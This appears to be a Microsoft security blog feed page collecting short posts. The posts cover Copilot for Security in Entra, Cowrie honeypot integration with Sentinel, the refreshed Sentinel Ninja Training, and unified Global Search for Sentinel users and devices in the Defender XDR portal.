Identity forensics with Copilot for Security Identity Analyst Plugin
Microsoft Copilot for Securityis a platform that brings together the power of AI and human expertise to help administrators and security teams respond to attacks faster and more effectively. Copilot for Security is embedded in Microsoft Entra so you can investigate and resolve identity risks, assess identities and access with AI-driven intelligence, and complete complex tasks quickly. Microsoft Copilot in Microsoft Entra gets insights from your Microsoft Entra users, groups, sign-in logs, audit logs, and more. You can explore sign-ins and risky users and get contextualized insights on how to resolve incidents and what to do to protect the accounts in natural language. Built on top of real-time machine learning, Copilot in Microsoft Entra can help you find gaps in access policies, generate identity workflows, and troubleshoot faster. You can also unlock new skills that allow admins at all levels to complete complex tasks such as incident investigation, sign-in log analysis, and more, to gain savings in time and resources.
Cowrie honeypot and its Integration with Microsoft Sentinel.
Honeypot: Honeypot is a security mechanism designed to attract, detect, and analyze malicious activities and attackers by simulating a vulnerable system or network service. The primary purpose of a honeypot is to provide a controlled environment where security professionals can observe and study attack methods, tools, and behaviors without putting actual production systems at risk. Integrating Honeypot (Cowrie) with Microsoft Sentinel brings several benefits for enhancing cybersecurity operations. Microsoft Sentinel is a cloud-native Security Information and Event Management (SIEM) service that provides intelligent security analytics and threat intelligence across the enterprise. By combining Cowrie’s detailed honeypot data with Sentinel’s advanced analytics and automation capabilities, organizations can achieve a more comprehensive and effective security posture. Analytical Rules, Threat Hunting, Automation, Workbooks, Custom Parsers.Level Up Your Security Skills with the New Microsoft Sentinel Ninja Training!
If you’ve explored our Microsoft Sentinel Ninja Training in the past, it’s time to revisit! Our training program has undergone some exciting changes to keep you ahead of the curve in the ever-evolving cybersecurity landscape. Microsoft Sentinel is a cutting-edge, cloud-native SIEM and SOAR solution designed to help security professionals protect their organizations from today’s complex threats. Our Ninja Training program is here to guide you through every aspect of this powerful tool. So, what’s new? In addition to the structured security roles format, the Ninja Training now offers a more interactive experience with updated modules, hands-on labs, and real-world scenarios. Whether you're focusing on threat detection, incident response, or automation, the training ensures you gain the practical skills needed to optimize your security operations. One of the biggest updates is the integration of Sentinel into the Defender XDR portal, creating a unified security platform. This merger simplifies workflows, speeds up incident response, and minimizes tool-switching, allowing for seamless operations. Other highlights include: Step-by-step guidance through the official Microsoft Sentinel documentation. Exclusive webinars and up-to-date blog posts from Microsoft experts. If you're ready to take your Sentinel skills to the next level or want to revisit the program’s new features, head over to the blog now and dive into the refreshed Microsoft Sentinel Ninja Training! Don’t miss out—your next cybersecurity breakthrough is just a click away!
What's New: Global Search in Unified Security Operations platform includes Sentinel user and devices
We are thrilled to announce a significant enhancement to our Unified Security Operations (SecOps) platform. The Global Search feature in the Defender XDR portal now supports searching for Microsoft Sentinel users and devices, providing a more comprehensive and unified search experience for the customers using Microsoft’s Unified Security Operations platform. This powerful feature allows you to search for devices, users, and other information by typing full or partial search terms. With this update, you can now search for Microsoft Sentinel entities directly within the Unified security operations platform, streamlining your workflow and improving efficiency. Key Benefits Unified Search Results: Microsoft Sentinel devices and users are now merged with Microsoft Defender XDR portal entities, providing a single, unified search result. This eliminates the need to switch between different tools. Increased efficiency and Time saving - The ability to search across Sentinel incidents and other data in the Defender portal cuts down investigation time, leading to faster resolution of security incidents. Comprehensive Identifier Support: The search feature supports various identifiers, ensuring that devices and users from Microsoft Sentinel and Defender with matching identifiers are merged into a single result. This includes identifiers such as HostName, NTDomain, DnsDomain, and NetBiosName. Improved User Experience: The integration simplifies the search experience, making it easier for security professionals to find the information they need quickly and efficiently. This enhancement is part of our ongoing effort to consolidate Microsoft Sentinel entities within the comprehensive XDR+SIEM platform. How to Get Started Getting started with the Global Search feature is simple: Access the Microsoft Defender XDR Portal: Log in to the Microsoft Defender XDR portal using your credentials. Navigate to Global Search: Locate the Global Search bar at the top of the portal. Enter Search Terms: Type in the full or partial search terms for the device or user you are looking for. The search will now include Sentinel entities along with Defender entities. Review Unified Results: The search results will display a unified view of Microsoft Sentinel and Defender entities, allowing you to quickly find the information you need. Use-Cases & Scenarios Incident Investigation: An analyst can use Global Search to quickly find all affected devices related to an incident. This allows for a faster and more efficient investigation. This makes it easier to investigate the scope of the issue and prioritize the appropriate response. Threat Hunting: Threat hunters can use Global Search to locate suspicious user activity or specific files that have been flagged as malicious, correlating these findings with other related alerts in the system. Device Tracking: Security teams can use Global Search to track a compromised device, checking for alerts, users associated with the device, and any incidents that might involve it. Supported Sentinel Host Identifiers Sentinel devices with the following strong identifiers can be searched and merged with Defender devices with matching identifiers: HostName+NTDomain HostName+DnsDomain NetBiosName+NTDomain NetBiosName+DnsDomain Supported Account Identifiers Sentinel accounts with the following strong identifiers can be merged with Defender user with matching identifiers: Name+UPNSuffix AADUserId Sid Moving Forward with Global Search With Global Search for Sentinel entities now available in the Microsoft Defender XDR portal, organizations can significantly enhance their security operations. This feature empowers security teams with the tools they need to efficiently search, investigate, and respond to threats—all from a single interface. By bringing together a unified search across incidents, alerts, users, devices, and files, the Global Search feature streamlines threat hunting, investigation, and response workflows. This ultimately helps organizations stay ahead of evolving threats and ensures they have the necessary context to protect their environment effectively. For more detailed information and documentation on how to use Global Search, visit the official Microsoft 365 Defender portal documentationCase Study: Harnessing Copilot for Security in Defending Against Cyberthreats
Get ready to dive into a real-life security incident within Microsoft Defender XDR! In this case study, you’ll take on the role of a security analyst and uncover how Copilot for Security can empower you throughout the investigation. Let’s see how you can tackle cyber threats head-on!
